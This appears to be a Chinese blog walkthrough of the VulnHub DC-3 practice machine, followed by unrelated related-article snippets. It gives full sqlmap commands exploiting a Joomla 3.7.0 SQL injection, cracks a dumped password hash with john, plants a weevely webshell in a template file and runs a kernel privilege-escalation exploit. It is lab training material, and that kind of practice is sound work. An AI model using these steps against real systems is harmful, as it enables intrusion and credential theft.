vulnhub靶场 DC-3

news2025/2/23 10:21:25

地址:
https://download.vulnhub.com/dc/DC-3-2.zip
开启NAT模式
namp只扫到了一个端口
在这里插入图片描述

打开网页有一个登录的页面
目录扫描一下,可以找到一个 后台登录界面在这里插入图片描述

看一下指纹信息
在这里插入图片描述
joomla cms
网上搜一下可以发现存在一个JoomScan工具
在kali上面安装一下
apt install joomscan

joomscan -u 扫一下, 发现它的版本为3.7.0
在这里插入图片描述

网上搜一下, 发现存在sql注入的漏洞

利用kali上面的工具
searchsploit joomla 3.7
在这里插入图片描述
找到这个漏洞文件, 照着sqlmap打, 换一下host
在这里插入图片描述

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

查表

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

在这里插入图片描述

查列名

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

在这里插入图片描述

查看数据

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]

在这里插入图片描述得到的密码是经过加密的, 用john爆破一下
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
放到1.txt中, 然后爆破
jonh 1.txt 得到密码: snoopy
在这里插入图片描述

用之前扫到的后台路径, 可以登录进去
在这里插入图片描述

再模板里面可以新建文件, 可以上传文件, 也可以直接更改文件的代码
使用weevely生成一个木马
https://blog.csdn.net/qq_45521281/article/details/106587791
在这里插入图片描述

将木马插入到index.php里面去
在这里插入图片描述

使用weevely进行连接weevely "http://192.168.75.135/index.php?tp=1&templateStyle=4" 1
在这里插入图片描述
其实也可以直接新建一个比如 1.php
然后写上一句话马, 或者反弹shell啥的,
访问到这个目录 /templates/beez3/1.php也就能够连上了
(我就是不知道如何找到这个目录的,有点懵)
连上去后, 权限比较低, 需要提权

看看是否有suid提权
find / -user root -perm -4000 -print 2>/dev/null
但是没找到可以用的
在这里插入图片描述

uname -a 看看系统信息, 看看内核版本在这里插入图片描述看看系统版本 cat /etc/*-release
在这里插入图片描述

找找这个版本是否存在一些漏洞

searchsploit ubuntu 16.04
在这里插入图片描述看到39772.txt
在这里插入图片描述访问相应的url, 下载到shell上面(一个39772.zip文件)
在这里插入图片描述

unzip 39772.zip   #解压
cd 39772
tar -xvf exploit.tar   # 解压

前面的文件下载那里是给了使用的教程的
在这里插入图片描述

cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

不知道为啥, 好像没有用
在这里插入图片描述

拿蚁剑连了一下, 重新上传了一下zip文件也是一样的, 不知道为啥
在这里插入图片描述

我看别人也是这个一样的回显啊, 咋别人就成root了, 我这就不行呢?
在这里插入图片描述

参考文章:
https://www.cnblogs.com/1-Ry/p/15075074.html
https://www.cnblogs.com/shadowink/p/14730761.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2150587.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

4. 密码协议

4. 密码协议 (1) 协议的基本概念 协议是一种在两个或多个参与者之间进行通信的规范,它定义了参与者之间的交互方式、消息格式和通信过程。协议的目的是确保通信的可靠性和安全性,防止信息被篡改、伪造或泄露。 (2) 密码协议分类及基本密码协议 密码协议是用于加密和解密数…

【Python报错已解决】ModuleNotFoundError: No module named ‘tensorflow‘

🎬 鸽芷咕:个人主页 🔥 个人专栏: 《C干货基地》《粉丝福利》 ⛺️生活的理想,就是为了理想的生活! 专栏介绍 在软件开发和日常使用中,BUG是不可避免的。本专栏致力于为广大开发者和技术爱好者提供一个关于BUG解决的经…

浅谈“流量回放”

一、流量回放定义 “流量回放”通常指的是将之前记录的网络请求和响应数据重新发送到系统中,以模拟真实用户的操作。这种技术主要用于测试和调试目的,帮助开发人员和测试人员更好地理解系统在特定条件下的行为。 二、流量回放的技术原理: 数…

前端动画库大比拼:为何选择Velocity.js

前端动画库大比拼:为何选择Velocity.js 前言 在现代网页设计中,动画效果是提升用户体验的重要手段。 Velocity.js: 一个与 jQuery 动画 API 兼容的动画引擎,以其卓越的性能和丰富的功能,成为了开发者的好工具。 本文将详细介绍…

大数据Flink(一百二十二):阿里云Flink MySQL连接器介绍

文章目录 阿里云Flink MySQL连接器介绍 一、特色功能 二、​​​​​​​语法结构 三、​​​​​​​​​​​​​​WITH参数 阿里云Flink MySQL连接器介绍 阿里云提供了MySQL连接器,其作为源表时,扮演的就是flink cdc的角色。 一、特色功能 MySQ…

【Qt笔记】QToolBox控件详解

目录 引言 一、QToolBox的基本功能 1.1 分页布局 1.2 可点击标签 1.3 图标支持 1.4 信号与槽 二、 QToolBox的属性设置 2.1 设置指定索引位置可用性 2.2 设置指定索引位置图标 2.3 设置标题 2.4 设置提示信息 2.5 获取信息 三、QToolBox的常用API 3.1 构造函数…

前端vue-单选按钮的实现

要把name“sex”和value"男" 和 要把name“sex”和value"女"写上,然后在各自的标签内部写上v-model绑定属性。data中定义v-model的绑定值,后面的值是默认选中的男或者女性。

Google Play金融类应用上了又被下,怎么搞定设备短信权限问题?

不久前谷歌对金融类产品应用更新了政策要求,即8月31日起新注册的开发者账号必须得注册为企业账号才可以上架金融类产品应用,这对原本就是用企业号的开发团队或公司没什么影响,但如果用的是个人号得做点准备了。 可以看出,谷歌对金…

剑灵服务端源码(c#版本+数据库+配套客户端+服务端)

剑灵服务端源码,喜欢的下载研究研究。谁技术牛B的话,能把最新版本的客户端接上,就好了。 剑灵服务端源码(c#版本数据库配套客户端服务端) 下载地址: 通过网盘分享的文件:【源码】剑灵服务端源码…

利士策分享,自我和解:通往赚钱与内心富足的和谐之道

利士策分享,自我和解:通往赚钱与内心富足的和谐之道 在这个快节奏、高压力的时代,我们往往在追求物质财富的同时,忽略了内心世界的和谐与平衡。 赚钱,作为现代生活中不可或缺的一部分,它不仅仅是生存的手段…

YOLOv8改进 - 注意力篇 - 引入ECA注意力机制

一、本文介绍 作为入门性第一篇,这里介绍了ECA注意力在YOLOv8中的使用。包含ECA原理分析,ECA的代码、ECA的使用方法、以及添加以后的yaml文件及运行记录。 二、ECA原理分析 ECA官方论文地址:ECA文章 ECA的pytorch版代码:ECA的…

C++第十一节课 new和delete

一、new和delete操作自定义类型 new/delete 和 malloc/free最大区别是 new/delete对于【自定义类型】除了开空间还会调用构造函数和析构函数&#xff08;new会自动调用构造函数&#xff1b;delete会调用析构函数&#xff09; class A { public:A(int a 0): _a(a){cout <&l…

systemd学习

传统init进程启动流程 kernel内核代码init/main.c&#xff0c;内核启动init进程过程&#xff1a; init进程是由内核启动的第一个&#xff08;也是唯一的一个&#xff09;用户进程&#xff08;进程id为1&#xff09;&#xff0c;它根据配置文件决定启动哪些程序&#xff0c;ini…

mybatisplus的多记录操作 批量删除和批量查询

1.批量查询 通过in查询 Testpublic void testBatchSelectByIds(){List<Integer> ids Arrays.asList(5,7);List<User> users userMapper.selectBatchIds(ids);log.info(users);} 2.批量删除 Testpublic void testBatchDelete(){List<Integer> ids Arrays…

LLM - 理解 多模态大语言模型(MLLM) 的 指令微调(Instruction-Tuning) 与相关技术 (四)

欢迎关注我的CSDN&#xff1a;https://spike.blog.csdn.net/ 本文地址&#xff1a;https://spike.blog.csdn.net/article/details/142237871 免责声明&#xff1a;本文来源于个人知识与公开资料&#xff0c;仅用于学术交流&#xff0c;欢迎讨论&#xff0c;不支持转载。 完备(F…

Java知识点小结3:内存回收

文章目录 对象引用强引用软引用&#xff08;SoftReference&#xff09;弱引用&#xff08;WeakReference&#xff09;考一考 虚引用&#xff08;PhantomReference&#xff09;总结 垃圾回收新生代老年代永生代 内存管理小技巧尽量使用直接量使用StringBuilder和StringBuffer进行…

Vue学习记录之六(组件实战及BEM框架了解)

一、BEM BEM是一种前端开发中常用的命名约定&#xff0c;主要用于CSS和HTML的结构化和模块化。BEM是Block、Element、Modifier的缩写。 Block&#xff08;块&#xff09;&#xff1a;独立的功能性页面组件&#xff0c;可以是一个简单的按钮&#xff0c;一个复杂的导航条&…

A Simple Encoder-Decoder for Open-Vocabulary Semantic Segmentation

FAM: Feature Aggregation Module&#xff0c;Circle with R represents removing feature maps of non-selected categories 辅助信息 权重有1.3G&#xff0c;不建议复现

neo4j关系的创建删除 图的删除

关系的创建和删除 关系创建 CREATE (:Person {name:"jack"})-[:LOVE]->(:Person {name:"Rose"})已有这个关系时&#xff0c;merge不起效果 MERGE (:Person {name:"Jack" })-[:LOVE]->(:Person {name:"Rose"})关系兼顾节点和关…

功耗中30分钟下载场景对平均电流标准的影响评估

下载场景的测试数据: 测试结论:相同场景下,有应用下载安装跟没应用下载安装,平均电流相差90-140mA左右 查看数据:下载场景的平均增量电流 (227+279) / 2 - 136 = 117 mA 理论的量化数据影响 根据当前的测试数据:静置待机平均电流 136 mA,下载场景平均电流增量 117mA, …